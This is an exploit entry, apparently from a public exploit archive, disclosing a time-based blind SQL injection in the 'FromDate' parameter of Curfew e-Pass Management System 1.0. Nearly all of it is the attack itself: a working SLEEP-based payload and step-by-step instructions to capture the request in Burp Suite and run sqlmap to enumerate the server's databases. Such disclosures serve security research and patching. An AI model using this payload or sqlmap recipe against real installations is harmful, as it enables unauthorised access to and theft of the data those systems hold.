# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL Injection # Date: 28/9/2023 # Exploit Author: Puja Dey # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Wamp 1) login into the application 2) click on report on pass and capture the request in burpsuite 3) Parameter "FromDate" is vulnerable to SQL Injection Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit= 4) Put '*' in the value for the parameter and save the item as cpme 5) Run sqlmap -r cpme --batch --dbs --random-agent